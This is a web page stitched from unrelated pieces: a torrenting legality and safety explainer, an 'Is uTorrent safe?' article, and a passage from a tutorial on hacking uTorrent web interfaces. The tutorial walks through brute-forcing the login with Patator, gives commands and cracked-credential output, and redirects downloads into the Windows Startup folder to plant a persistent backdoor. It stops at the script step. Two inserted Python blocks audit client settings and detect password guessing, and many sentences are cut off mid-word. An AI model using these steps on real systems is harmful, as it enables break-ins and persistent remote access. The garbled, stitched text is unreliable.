What is Torrenting? Is it Safe? Is it illegal? Will you be caught?
Looking to find out more about torrenting? We explain exactly what torrenting is, how to torrent safely, and what to do if you get caught.
@pabischoff UPDATED: April 8, 2021
Three questions I’m often asked are: Is torrenting safe, is torrenting legal, and what happens if I get caught? This post answers those questions and looks at the methods torrenters use to stay safe and anonymous.
What is Torrenting?
Torrenting is the act of downloading and uploading files through the BitTorrent network. Instead of downloading files from a central server, torrenting involves downloading files from other users’ devices on the network. Conversely, users upload files from their own devices for other users to download.
Torrenting is the most popular form of peer-to-peer (P2P) file-sharing, and it requires torrent management software to connect to the BitTorrent network. Such software can be downloaded for free for a number of different devices.
Everyone downloading or uploading the same file is called a peer, and collectively they are known as a swarm. Because of how BitTorrent works, a peer can download a file from several other users at once, or upload a file to multiple other users simultaneously.
Torrenting is often associated with piracy because it’s frequently used to share files that are protected by copyright, including movies, games, music, and software. However, torrenting has many legitimate uses as well, such as lessening the load on centralized servers by distributing the hosting burden among users.
Torrenting safety and legality: In short
Is torrenting legal or illegal? Torrenting itself isn’t illegal, but downloading unsanctioned copyrighted material is. It’s not always immediately apparent which content is legal to torrent and which isn’t. Some fall in a gray area, so you may find yourself unwittingly on the wrong side of the law.
Your internet service provider (ISP) and copyright trolls monitoring the BitTorrent network can take action if they catch you illegally torrenting. This can range from a warning letter and throttling (slowing down) of your internet connection speeds to legal action – although the latter is increasingly rare.
Digital privacy-conscious torrenters will use VPN services, or virtual private networks, to keep their internet activity hidden from their ISP. With a wide range of applications, some VPNs are better suited for torrenting than others. If you want to keep your ISP from snooping on your activity, choose a VPN connection that: a) doesn’t keep a log of your activity, b) isn’t based in a country where the legal system can be used to demand customer records, and c) is fast enough that it won’t slow entire downloads. We’ve rounded up the providers that fit these criteria and others in our list of the best torrenting VPN services.
How to torrent safely
It is relatively simple to torrent safely and keep your online activity private. Note that while a VPN for torrenting will keep your activity private and safe from prying eyes, you may still be susceptible to malware from some public torrent sites. Follow these 5 steps to torrent privately with a VPN.
Here’s how to torrent safely:
1. Download and install a VPN matching the criteria mentioned above. We recommend NordVPN.
2. Enable your VPN’s kill switch, if it has one.
3. Connect to a VPN server, preferably in a P2P-friendly country.
4. Once the connection is established, open your torrent client and start downloading as usual.
5. Your online activity is now encrypted by your VPN.
Torrenting without a VPN
Torrenting without a VPN means your internet service provider (ISP) can see your online activity including the sites you visit and the content you view. In certain countries, including the US, ISPs are allowed to share this information with third parties including intellectual property owners. A VPN will keep your online activity private from your ISP.
Is uTorrent safe?
uTorrent is the official torrent client from the creators of the BitTorrent protocol. It is proprietary—not open source—software maintained by a legal US company. Like BitTorrent, the uTorrent software itself is legal, although it can be used for digital piracy. The official uTorrent is free of malware and can be used safely and privately in combination with a VPN. It does not, however, prevent users from downloading malicious files that can infect their device.
The BitTorrent protocol rose to become the most popular medium for peer-to-peer file sharing in the world after the demise of centralized services like Napster and Limewire. Unlike those services, torrenting is almost completely decentralized save for the trackers that allow users to search and download torrent files and magnet links. Torrent files and magnet links are used to find other users on the network who host the desired file or files but do not actually host those files for downloading.
Is BitTorrent safe and legal?
The BitTorrent protocol is not in itself illegal or unsafe. It is just the means to share any type of file, and plenty of legal torrenting services do exist. The most popular torrent trackers, such as ThePirateBay and KickassTorrents, however, operate in a legal grey area, offering users free access to copyrighted content. Sharing and downloading copyrighted content by BitTorrent, or other means, is illegal in many countries and can be unsafe since sites including KickassTorrents have been shown to host malware.
These trackers would argue that they simply find and organize information that is already out there, and they do not illegally host any copyrighted content on their own servers. Just like the BitTorrent protocol itself, they are the means to an end. Not everyone is convinced. Major trackers have come under heavy legal scrutiny from content creators and distributors who argue the trackers enable and encourage theft.
The blame ultimately shifts to the users, the millions of individuals who host files on their personal computers, downloading and uploading movies, games, software, music, ebooks, and more. Users connected to the same tracker are called peers, and they fall into two categories. A leech uses a torrent file or magnet link to download the file from other users on the network who already have the file. These users who already have the file are called seeds. When a leech is finished downloading a file (or even just part of a file), he or she becomes a seed, allowing other leeches to download the file from his or her computer. As a general rule, it’s considered proper pirate etiquette to seed as much as you leech.
Comparitech does not condone or encourage any violation of copyright law or restrictions. Please consider the law, victims, and risks of copyright piracy before downloading copyrighted material without permission.
Legally speaking, seeding and leeching copyrighted material fall into different criminal categories. Think of it like buying illegal drugs: purchasing the drugs for personal use is definitely a crime, but a relatively minor one. Turning around and selling those drugs to others is a much more serious offense. Finding the original source of the drugs, or in this case the HD rip of the new Avengers movie, would be the best case scenario for law enforcement, but that isn’t always possible. The trackers act as the shady back alley marketplaces where all of these transactions go down, but they don’t personally handle any of the drugs.
What happens if you are caught torrenting?
The prosecution of torrent users has been sporadic. The chances of actually going to court or having to pay a settlement are pretty slim, but the penalties can be extremely high. The frequency of copyright holders suing torrenters for copyright infringement peaked in the late 2000s. Copyright pirates were sued for wildly disproportionate amounts of money, and most settled out of court.
These public scare tactics shone poorly on the recording and movie industries because they were portrayed as petty millionaires bullying poor college students. Direct lawsuits are much less common these days, but the campaign against torrenters is far from over.
Now the job of going after individual copyright pirates has been outsourced to a growing number of small businesses known as copyright trolls. These companies locate torrenters who illegally download copyrighted content through their real IP addresses. They then approach the copyright owners and sign a deal that lets them take legal action on their behalf. Others are hired directly by Hollywood production companies to sniff out pirates.
With legal leverage and a list of names, the copyright trolls then go after torrenters via mail, email, or even by going door to door and handing out settlement letters. These letters are not legally binding documents or injunctions. Copyright trolls use intimidation, fear, and shame to make torrenters pay without ever going to court. A common tactic is to threaten to sue for over $100,000 but only ask for $3,000 or so in the settlement. That makes the $3,000 look like a good deal, but going to court is costly and risky for them, so don’t give in if you receive such a letter.
What to do if you receive a settlement letter
The most common way to receive a settlement letter is through your internet provider. A copyright troll will go through the court system to subpoena your ISP and force it to email customers with a legal threat and hand over personal details.
According to US law, an IP address is not a person. If you were contacted through your ISP, chances are that’s because the copyright troll doesn’t know your actual identity yet. If the letter doesn’t contain any identifying information on you, keep it that way and do nothing. Your case could be dismissed before the date that your ISP is set to reveal your personal details to the troll. If you respond and identify yourself, that gives the troll a more direct means of targeting you.
This is a game of probability for copyright trolls. If they send out 1,000 threatening emails and 50 people reply, they only need a handful to actually cough up money to make it worth their time. Chances are it’s more cost effective for them to move on to the next swarm of torrenters than pursue the remaining 950 people.
If things escalate and you decide to take action, lawyer up. Here’s a list of attorneys compiled by the Electronic Frontier Foundation that specialize in these sorts of cases.
Depending on your ISP, it may take actions against you on its own behalf. That could mean throttling your internet connection or threatening to hand over personal details to a copyright troll. Why does your ISP even care? Because torrenting takes up a lot of bandwidth, and that bandwidth costs ISPs money. On top of that, an ISP could be receiving kickbacks from content owners and their associates.
How to protect yourself
To avoid any legal ramifications, it’s best to simply not torrent. However, if you insist on torrenting, take the time to protect your online privacy and keep copyright trolls at bay.
Use a VPN when torrenting
The best way to torrent safely is by using a VPN. A VPN accomplishes two things: first, it re-routes all your internet traffic through a server in a location of your choosing, which changes your real IP address to one used by hundreds or thousands of other people (assuming your VPN uses shared IP addresses, which most do). This adds a significant layer of anonymity and makes it much more difficult for anyone to track you. Second, a VPN encrypts all your torrent traffic before it leaves your computer. That means your ISP cannot monitor your internet activity, nor can anyone else. And because all your traffic heads to the VPN server first, ISPs can’t even tell where it’s going.
Using a quality VPN is key; don’t settle for a “free” service or VPNs that log your activity, cap your bandwidth and data, or don’t provide sufficient DNS leak protection. Not all VPNs tolerate torrenting. You can check out our list of the best VPNs for torrenting here, which are services with fast download speeds and a focus on online privacy, security and anonymity like NordVPN, Surfshark, and ExpressVPN among others.
If you don’t want to pay for a VPN, you might be considering Tor. Tor is similar to a VPN in that it routes your traffic through several volunteer “nodes” while encrypting traffic. We recommend a VPN over Tor for a couple reasons. First, Tor is slow, and usually best for simple browsing and other low-bandwidth activity. Second, connecting to Tor could actually draw more attention from your ISP and law enforcement, as it’s a well-known tool for hackers and criminals.
Another popular app among torrenters is Peerblock. Peerblock is a desktop firewall with a regularly updated blacklist of IP addresses. These IP addresses belong to entities that try to track your activity online, especially on peer-to-peer networks. Unfortunately, the blacklist is only updated once upon installation. After that, users must pay to keep them updated. Even if you’re willing to pay, it’s unlikely that the blacklist could contain every possible IP address for copyright trolls, universities, and law enforcement. A copyright troll just needs to connect to the swarm–all the devices connected to a single torrent–with an IP that isn’t on that blacklist to get your IP address.
Instead of torrenting, another alternative is Usenet. Usenet is a paid service – usually between $10 and $20 per month – where you download files from centralized servers instead of a network of peers. Usenet downloads are much, much faster; often as fast as your ISP can handle. Usenet is more private as well. The connections take place between you and the provider’s network of servers, and the best providers offer an SSL-encrypted connection. Some even throw in VPNs for good measure. Torrents, on the other hand, require that you share at least some identifying information to connect to the tracker and peers.
Finally, downloading a Usenet file doesn’t mean you have to seed it for other internet users afterward. Legally, this makes you less of a target because you’re not supplying strangers with copyrighted content, at the same time consuming fewer computer resources and internet bandwidth.
Usenet providers make files available for a certain number of days. How many depends on the provider, but the standard is 1,200 days after the original posting. Until that time is up, users have full access to that file. Torrents only stay up as long as people seed the file.
We’ve rounded up some of the best Usenet providers here.
Public vs private trackers
A “tracker” is like a search engine that indexes files on the BitTorrent network. Trackers can be private or public, and the former usually requires an invitation from an existing member.
ThePirateBay, KickassTorrents, and Demonoid are all examples of public trackers. Anyone can just go to their respective websites and search without logging in or requiring any sort of authentication. Likewise, anyone can upload files for others to download. These uploads are not moderated, so users must judge whether a download is safe and accurate based on comments and the reputation of the uploader.
Private trackers are more exclusive both in terms of who can upload and who can download within a group. They vary wildly in terms of content and quality, but many members of private trackers attest that they have higher quality files, faster downloads, longer retention, and an overall more consistent and safe experience.
The law views private trackers the same as public trackers. Internet piracy is piracy whether you do it in public or within a private group.
Streaming vs torrenting
Many people have moved away from downloading entire files through BitTorrent and opt instead to stream video content either on their web browsers or through customized programs like Kodi. When it comes to safety and the law, what’s the difference?
Legally speaking, you’re probably still breaking the law when you stream illegal content from a pirated source. However, this depends largely on your country. In the UK, it’s outright illegal. In India, a court ruled that it is absolutely not illegal. In the US, it’s still a grey area, as there’s been no precedent of anyone being convicted for copyright piracy after streaming copyrighted video content from an unsanctioned source.
Those who upload the videos without compensating or asking permission from the copyright holder do so illegally. That’s pretty much standard no matter where you are.
Not only do laws tend to be more lenient toward streaming content, but it’s also more difficult for copyright trolls and law enforcement to catch users in the act. When you download a torrent, you can see the IP addresses of everyone else you’re uploading to or downloading from. But streaming transmits a video directly from a website to your device, with no third parties involved.
Don’t get too comfortable, however, as there are still risks. The website could be logging IP addresses or other information about its users, which it could then hand over to law enforcement or a copyright troll. Your ISP could monitor your activity and see that you are watching pirated content. These are risks that can be mitigated by connecting to a reputable VPN.
When it comes to security, streaming video carries just as many risks as torrenting. Websites that stream pirated content tend to be chock full of intrusive ads, malware, and phishing threats. Kodi users are subject to man-in-the-middle (MITM) attacks and other threats from the add-ons they download.
As a rule of thumb, avoid downloading movies that were released on DVD and Blu-Ray in the past 60 days, especially big-hit blockbusters. That’s when movies make the vast majority of their post-box office money, after which their income significantly drops off. Copyright holders will put most of their anti-piracy resources into going after torrenters of new releases to minimize the financial damage. The same goes for TV series, shows and video games.
Users of Popcorn Time, the free movie-streaming app, should tread just as carefully as torrenters. Many Popcorn Time users don’t realize that the app actually streams directly from torrents and will even seed a file so it is uploaded to other users. All the risks associated with Popcorn Time apply in equal measure to torrenting.
Choose your torrents wisely. The most popular torrents on ThePirateBay and KickassTorrents are probably the ones being most closely monitored by copyright trolls. However, don’t pick totally unpopular ones either. Read through the comments section, where users often run virus scans on torrent downloads and post the results. They will also give you a general review of the quality.
Even if the comments are positive, run your own virus scans as well. Ideally, use multiple antivirus programs to run an array of scans, as each of their virus libraries can differ. Not all antivirus programs play nice with each other, however, so mixing two or more must be done with care. We recommend Bitdefender to scan all downloads before opening. This is especially important when downloading games and software, which are often “cracked” by the uploader. Cracks make it easier to bypass DRM schemes that validate content with the publisher, but they also make it easier to distribute hidden malware, spyware, and viruses. Check out Comparitech’s antivirus reviews section here.
Why did BitTorrent install adware on my computer?
BitTorrent is a network and protocol used to share files, so BitTorrent itself cannot install adware on your computer.
However, the programs used to connect to the BitTorrent network and download files, called torrent managers or torrent clients, can and often do come with adware. The files you download can also contain malware and adware.
Stick to reputable torrent managers and, if prompted, refuse any offers to install additional software alongside them. These additional programs are often adware.
Likewise, be sure to only download and upload torrents you
Is downloading a shared torrent from Google Drive illegal?
If you’re downloading something from Google Drive, then it’s not a torrent. It’s just a download. The file might have originally been downloaded through BitTorrent, then uploaded to Google Drive where others can download it.
Semantics aside, if the content of the file is protected by copyright, then yes, it is illegal to download pirated files from Google
Can I just download a torrent from a public place?
Most torrenters use public trackers to find and download files through BitTorrent. So in that sense, yes, you can download a torrent from a public place provided you have a torrent client installed on your device.
The files themselves are downloaded from other BitTorrent users who have downloaded the file and are now uploading it to fellow users.
Private trackers are also available and are often safer, but typically require an invitation from an existing
Can I go to jail for torrenting?
It depends on the circumstances, but no, it’s highly doubtful you would go to jail for torrenting. Most lawsuits regarding torrenting are civil suits, not criminal ones, so if a penalty is levied, it’s usually a fine or some other monetary compensation.
That being said, it also depends on what country you’re in, what you torrent, and whether you also seeded the file so it could be downloaded by other users. Check your local laws and
What are the risks of torrenting music?
The music recording industry has, on occasion, aggressively targeted torrenters who engaged in music piracy. These days, litigation is mostly done by copyright trolls who target torrenters on behalf of recording studios. They’ll send out settlement letters demanding hundreds or even thousands of dollars to torrenters whom they can identify. They usually go through internet service providers to contact torrenters. Your ISP could throw you under the bus, and that’s not a gamble we recommend taking. By using a VPN, you can greatly reduce the risk of being identified by a copyright troll.
Is uTorrent Safe? – Security Gladiators
Is uTorrent safe? In our experience, the answer to this question may not be as straightforward as you may think.
Let’s take a look at what constitutes safety and whether or not torrent clients like uTorrent can really protect your privacy and security.
‘Is uTorrent Safe’ Is Not the Right Question You Should Be Asking
The question should not be, “Is uTorrent safe?” Instead, we should ask, “How safe can it be?” In other words, whether or not uTorrent is safe depends entirely on how you use it.
You have to choose how safe you want uTorrent to be.
Ultimately, uTorrent is nothing but a torrent client that helps you download files of all types from the internet if you have the right .torrent file with you.
So how can you be proactive about staying safe while using uTorrent? You can start by encrypting your hard drive.
While downloading files, you should also try to remove all the torrent trackers in your list of trackers (accessible by right-clicking the file that’s being downloaded, then going to the tracker list and deleting all the items from the list with the backspace key).
This is important: We also always recommend using a VPN service to enhance your privacy while you’re downloading files on the internet. We’ll get more into that later.
In itself, uTorrent—as a P2P software program—is safe. You will not get any spyware or malware from installing uTorrent on your computer if you downloaded the program from the company’s official website. If there’s a threat to your computer or your data, then it does not come from uTorrent.
However, this doesn’t mean there’s no threat at all. uTorrent may not want to infect your computer with malware, but there are plenty of actors in the torrenting chain who do. Since uTorrent is a torrent client, it opens the door for ill-intentioned users who are bent on hacking others in the torrenting ecosystem.
Let’s discuss some of the risks that are always present when you’re downloading torrents.
DISCLAIMER: Security Gladiators in no way encourages or condones any kind of copyright violation or circumvention of restrictions. That includes torrenting or downloading illegal content. Torrenting is a great way to access and share all kinds of content on the internet and there are plenty of opportunities there to engage in legal and safe online torrenting. You need to do your own research to see if these services and torrents are legal in your own country. We suggest always using a VPN while torrenting.
What Are the Disadvantages of Torrenting?
The first problem with using uTorrent is that you can accidentally download files that are infected with viruses.
Warning: Hackers have gained the experience to now know that the easiest way to get a virus to a given user’s computer is to inject it into a torrent file.
And since the user willingly downloads the file themselves, the virus gets installed on the system in question with ease. Hackers then proceed to gain access to your computer, take control of your data, encrypt your hard drive and then demand a ransom payment before you can get your data back. This is the ransomware model.
The second problem regards the legality of torrenting. Many torrents are movies and TV shows that are protected under copyright laws.
Now, if you live in a country where regulatory agencies monitor internet users to see what they’re downloading on the internet, then that could get you in trouble.
In the U.S., you may receive a DMCA notice, in compliance with the Digital Millennium Copyright Act of 1998.
The third problem deals with internet service providers, which are just as likely to spy on you as any given hacker group. With that said, it is also true that different internet service providers take different positions on torrenting and torrent clients.
Some ban it, some are mildly strict with its use, while others allow it as much as the user wants. Some internet service providers will simply cancel your contract with them if they find out you’re using a torrent client to download copyrighted content on the internet.
Internet service providers are also known to collect data on their customers and then sell that data to third parties such as advertising firms.
Government agencies, copyright groups and internet marketing agencies all want to get their hands on your data, and internet service providers are the last entity that you should expect to stand up to them and protect it.
This is why you should always use a VPN (short for Virtual Private Network) while downloading torrent files to ensure that no government agency or internet service provider can see what you’re doing.
The key advantage of using a VPN service is that it encrypts the tunnel through which data enters and exits your internet connection.
So even if your internet service provider can decrypt the tunnel, it still would not be able to decrypt your data. Essentially, a VPN provides double security for your data. More on that below.
Simple Ways to Make uTorrent Safe
The simplest way to make uTorrent safe is to use software that protects your privacy and anonymity. The best tool to do this is a VPN service. Click here to learn more about the best VPN service providers for torrenting. We’ve also put together a ranking of top VPN services. We also have a list of VPNs best for µtorrent.
Secondly, make sure you only download files from sources that are trustworthy. You can go to Reddit and other forums to read about the most reliable torrent sites, then make a decision based on your research. Or click here to read our roundup of the best torrent sites.
Thirdly, use a good antivirus software application so that even if you mistakenly download a virus, you have a tool that can notify you about it.
And finally, have a firewall in place to block malware well before it reaches your data. Almost all operating systems have some sort of firewall. Check to make sure it’s enabled. You can also get personal firewall software for an extra layer of protection.
How to Hack uTorrent Clients & Backdoor the Operating System
Compromised uTorrent clients can be abused to download a malicious torrent file. The malicious file is designed to embed a persistent backdoor and execute when Windows 10 reboots, granting the attacker remote access to the operating system at
Torrent clients like uTorrent and Transmission have built-in features that allow server administrators to remotely access the torrent client via web application interfaces, as shown in the below image example of uTorrent’s web app. Overall, the number of publicly accessible torrent clients is growing. As torrent clients increase in popularity, so does the number of poorly configured and insecure services. Like all web apps, these clients can be hacked in various ways. For instance, in recent years, numerous directory traversal, privilege escalation, and cross-site scripting vulnerabilities have been disclosed, as seen in the image below. In the future, attackers may discover ways of bypassing authentication
Understanding the Attack
So, a torrent client gets hacked… what’s the worst an attacker can do? Pirate some copyrighted materials? Well, yes, but it gets worse. Torrent clients are capable of creating files and directories on the system as well as replacing existing ones. That access to the filesystem can be abused by downloading malicious files through the compromised torrent
For example, on Windows 10 computers, an attacker can download an executable or script into the Startup directory, as shown in the GIF below. The Startup directory will execute any files it detects without user interaction — every time the server or computer
Modifying the default download directory in a hacked uTorrent client.
Linux systems are equally vulnerable to such attacks but are out of the scope of our demonstration here. The file found in most Linux systems is essentially a Bash script that’s executed every time a new terminal is opened or SSH login is established. An attacker can use the compromised torrent client to download a malicious file, replacing the original one found on the server. It would cause the server to execute the attacker’s when someone successfully authenticates to the
This article will show how uTorrent web apps can be brute-forced and used to download a PowerShell script into the Windows 10 Startup directory. The PowerShell script is designed to embed a persistent backdoor and immediately delete itself when completed.
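A defender's check for the abuse described above, as an added example that is not from the original article: it audits the settings.json of Transmission (the other client the article names) for a remote-control interface reachable without restriction and for a download directory that points at an auto-run location. Both sample configurations are constructed, and the list of auto-run directories is an assumption to extend for your own systems.

```python
import json
import posixpath
import re

# Directories whose contents run automatically at logon, boot or session start.
# Assumed list for this example; extend it for your own platforms.
AUTORUN_MARKERS = (
    "/start menu/programs/startup",  # Windows per-user and all-users Startup
    "/.config/autostart",            # freedesktop session autostart
    "/etc/profile.d",
    "/etc/cron.d",
    "/etc/init.d",
)
# A home directory root holds shell and profile start-up files.
HOME_ROOT = re.compile(r"^(/home/[^/]+|/root|[a-z]:/users/[^/]+)$")


def normalize(path):
    """Lower-case, forward-slash, '..'-resolved form for comparison."""
    return posixpath.normpath(path.replace("\\", "/").lower())


def risky_directory(path):
    """Return a reason string if the client should not write here, else None."""
    p = normalize(path)
    if any(marker + "/" in p + "/" for marker in AUTORUN_MARKERS):
        return "autorun-location"
    if HOME_ROOT.match(p):
        return "home-directory-root"
    return None


def audit(cfg):
    """Return finding codes for a parsed settings.json (missing keys are skipped)."""
    findings = []
    rpc_on = cfg.get("rpc-enabled") is True
    if rpc_on and cfg.get("rpc-authentication-required") is False:
        findings.append("rpc-no-auth")
    if rpc_on:
        entries = [e.strip() for e in str(cfg.get("rpc-whitelist", "")).split(",")]
        unrestricted = (cfg.get("rpc-whitelist-enabled") is False
                        or any(e in ("*", "*.*.*.*") for e in entries))
        if unrestricted and cfg.get("rpc-bind-address") in ("0.0.0.0", "::"):
            findings.append("rpc-reachable-from-any-address")
    for key in ("download-dir", "incomplete-dir"):
        value = cfg.get(key)
        reason = risky_directory(value) if isinstance(value, str) else None
        if reason:
            findings.append(f"{key}:{reason}")
    return findings


# Constructed sample: the weak configuration.
WEAK = json.loads(r"""{
  "rpc-enabled": true,
  "rpc-authentication-required": false,
  "rpc-bind-address": "0.0.0.0",
  "rpc-whitelist-enabled": false,
  "download-dir": "C:\\Users\\svc\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
}""")

# Constructed sample: the corrected counterpart.
HARDENED = json.loads("""{
  "rpc-enabled": true,
  "rpc-authentication-required": true,
  "rpc-bind-address": "127.0.0.1",
  "rpc-whitelist-enabled": true,
  "rpc-whitelist": "127.0.0.1",
  "download-dir": "/srv/torrents/complete",
  "incomplete-dir": "/srv/torrents/incomplete"
}""")

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit(cfg) or "no findings")
```

Run it against the real file with `audit(json.load(open(path)))`, and pair it with file-integrity monitoring on the auto-run directories themselves.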
Step 1: Brute-Force the Login with Patator
As research suggests, most passwords are six to eight characters in length. Weak passwords may allow attackers to guess the uTorrent login password and begin manipulating files on the
Patator is a brute-forcing tool, like Hydra, Medusa, and Burp’s Intruder module. Using Patator to brute-force web app logins is very similar to brute-forcing router gateways. In my previous article, “Break into Router Gateways with Patator,” command line usage and examples are covered in great
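Password guessing of this kind shows up in access logs as a burst of 401 responses from one source, and a 200 right after the burst suggests a guess succeeded. The detector below is an added example, not from the original article; it assumes the web UI is published through a reverse proxy that writes common-log-format lines, and the /gui path prefix, the thresholds and every sample line are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})\b'
)


def detect(lines, threshold=5, window=timedelta(seconds=60), prefix="/gui"):
    """Map source IP -> verdict for bursts of failed logins on the web UI.

    A browser's normal Basic-auth handshake is one 401 followed by a 200,
    which stays below the threshold and is not reported.
    """
    failures = defaultdict(deque)   # ip -> timestamps of recent 401s
    flagged = {}
    for line in lines:
        m = LINE.match(line)
        if not m or not m["path"].startswith(prefix):
            continue
        ip = m["ip"]
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        status = int(m["status"])
        recent = failures[ip]
        while recent and ts - recent[0] > window:
            recent.popleft()        # forget failures older than the window
        if status == 401:
            recent.append(ts)
            if len(recent) >= threshold:
                flagged.setdefault(ip, "password-guessing")
        elif status == 200 and ip in flagged and recent:
            # Success while the burst is still inside the window.
            flagged[ip] = "guessing-then-login"
    return flagged


def sample_line(ip, clock, status):
    """Build one constructed log line (documentation-range addresses)."""
    return f'{ip} - - [08/Apr/2021:{clock} +0000] "GET /gui/ HTTP/1.1" {status} 512'


SAMPLE = (
    # Five failures in five seconds, then a success: reported.
    [sample_line("203.0.113.7", f"10:00:0{i}", 401) for i in range(5)]
    + [sample_line("203.0.113.7", "10:00:06", 200)]
    # Ordinary login: one challenge, then success. Not reported.
    + [sample_line("198.51.100.20", "10:01:00", 401),
       sample_line("198.51.100.20", "10:01:01", 200)]
    # Five failures two minutes apart: never five inside one window.
    + [sample_line("192.0.2.9", f"10:0{2 * i}:00", 401) for i in range(5)]
)

if __name__ == "__main__":
    for ip, verdict in detect(SAMPLE).items():
        print(ip, verdict)
```

The third sample source shows the limit of a short window: slow guessing needs a longer window or a per-day failure count alongside this check.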
1. Install Patator
To get started, install Patator with the following command if it’s not already installed. In full versions of Kali Linux, Patator may already be on the system.
~# apt-get update && apt-get install patator
Reading package lists… Done
Building dependency tree
Reading state information… Done
The following NEW packages will be installed:
ca-certificates-java default-jre default-jre-headless fonts-dejavu-extra freerdp2-x11 ike-scan java-common ldap-utils libatk-wrapper-java libatk-wrapper-java-jni libfreerdp-client2-2
libfreerdp2-2 libgif7 libwinpr2-2 openjdk-11-jre openjdk-11-jre-headless patator python3-ajpy python3-bcrypt python3-dnspython python3-ipy python3-mysqldb python3-nacl python3-openssl
python3-paramiko python3-psycopg2 unzip
0 upgraded, 27 newly installed, 0 to remove and 0 not upgraded.
Need to get 43.9 MB of archives.
After this operation, 192 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
2. Capture a Login Request with Burp’s Proxy
Open Firefox and Burp Suite. Configure Firefox to proxy requests through Burp and capture the login request. Replace the encoded “Authentication: Basic” string with “FILE0,” right-click it, and choose the “Copy to file” option. The FILE0 string will act as a placeholder for Patator’s wordlist. Save the request to the /tmp directory with the “”
3. Generate a Targeted Wordlist
has published wordlists containing cracked passwords obtained in recent years. The 2018 wordlist, highlighted in the image below, can be downloaded by navigating to the website. That’s the one we’re using as an example in this guide. Unzip the archive with the 7z x archive.7z command, where “archive” is the directory and filename of the compressed file you downloaded. For instance:
~# 7z x /root/Downloads/
7-Zip 16.02: Copyright (c) 1999-2016 Igor Pavlov: 2016-05-21
p7zip Version 16.02 (, Utf16=on, HugeFiles=on, 64 bits, 4 CPUs Intel(R) Core(TM) i7-4770HQ CPU @ 2.20GHz (40661), ASM, AES-NI)
Scanning the drive for archives:
1 file, 1424620615 bytes (1359 MiB)
Extracting archive: /root/Downloads/
Path = /root/Downloads/
Type = 7z
Physical Size = 1424620615
Headers Size = 142
Method = LZMA:24
Solid = –
Blocks = 1
Everything is Ok
Compressed: 1424620615
Then, encode each line in the wordlist with base64. The “admin” username is the default with uTorrent web apps. Swap out the “./” directory and file with the location and name of your downloaded wordlist.
~# while read password; do printf "admin:$password" | base64; done < ./ >> ./
4. Brute-Force with Patator
In my tests against uTorrent version 3.5.5 in Windows 10, there didn’t seem to be any kind of blacklisting or rate-limiting invoked by hundreds of thousands of failed login attempts. It would appear uTorrent allows an infinite number of login attempts over any prolonged period of time.
To brute-force uTorrent web logins, use the below patator command with the file created in step two. Make sure you substitute any paths below to the right directory, as yours may be different.
~# patator _fuzz raw_request=/tmp/ accept_cookie=1 follow=1 0=./
16:31:45 patator INFO – Starting Patator v0.7 () at 2020-01-29 16:31 EST
To break that command down:
raw_request= — Use the file created in an earlier step to generate login attempts against the web app.
accept_cookie= — Save received cookies to issue them in future requests.
follow= — Follow Location redirects for both failed and successful login attempts if instructed by the server.
0= — The “FILE0” placeholder in the saved request will iterate through the provided list of passwords.
After executing the Patator command, the output will appear as shown below:
code size:clen time | candidate | num | mesg
401 159:0 0.004 | YWRtaW46ISEhbWFmZWlmZWkxMjM0NQ== | 9902 | HTTP/1.1 401 Unauthorized
200 42340:42176 0.073 | YWRtaW46UGFTU3dvUkRAMTIzNA== | 9985 | HTTP/1.1 200 OK
401 159:0 0.004 | YWRtaW46ISEhcG9wOTI= | 9995 | HTTP/1.1 401 Unauthorized
Hits/Done/Skip/Fail/Size: 10000/10000/0/0/10000, Avg: 1607 r/s, Time: 0h 0m 6s
Failed login attempts can be filtered out. Successful logins can be decoded with base64. For example:
~# base64 -d <<< 'YWRtaW46UGFTU3dvUkRAMTIzNA=='
admin:PaSSwoRD@1234
Step 2: Modify the Default Download Directory
After gaining access to the torrent client, if there are no active downloads, simply add any torrent file and click the "General" tab to identify the username on the Windows system. The torrent can be deleted after discovering the username. Open the "Preferences" and click on the "Directories" tab. Check the "Put new downloads in" button and enter the following Startup directory.
C:\Users\
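For defenders, the guessing run from Step 1 (a burst of 401 responses from one source, then a 200) stands out in HTTP logs because nothing throttles it. The following is an added example, not code from the original article: it assumes a reverse proxy in front of the web UI that writes combined-format access logs, and the log lines, addresses, request path and thresholds are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined log format as written by a reverse proxy (assumed deployment).
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[^"]*" (?P<status>\d{3}) ')

def detect_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Return (ip, kind, failures_in_window) alerts for bursts of 401s."""
    recent = defaultdict(deque)          # ip -> timestamps of recent 401s
    flagged, alerts = set(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, status = m["ip"], m["status"]
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[ip]
        while q and ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if status == "401":
            q.append(ts)
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, "bruteforce", len(q)))
        elif status == "200" and len(q) >= threshold:
            # A success right after a burst of failures: treat the
            # credential as guessed and rotate it.
            alerts.append((ip, "success_after_bruteforce", len(q)))
            q.clear()
    return alerts

def sample_log():
    """Constructed log: one ordinary login and one guessing run ending in a 200."""
    fmt = '{ip} - admin [29/Jan/2020:16:31:{s:02d} -0500] "GET /gui/ HTTP/1.1" {st} {n}'
    lines = [fmt.format(ip="192.0.2.10", s=1, st=401, n=159),
             fmt.format(ip="192.0.2.10", s=4, st=200, n=42340)]
    lines += [fmt.format(ip="198.51.100.7", s=45 + i // 10, st=401, n=159)
              for i in range(40)]
    lines.append(fmt.format(ip="198.51.100.7", s=49, st=200, n=42340))
    return lines

if __name__ == "__main__":
    for alert in detect_bruteforce(sample_log()):
        print(alert)
```

The same per-source failure counter is what a lockout or rate limit at the proxy would act on, which is the control the web UI itself did not show in the tests above.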
Step 3: Create the PowerShell Script
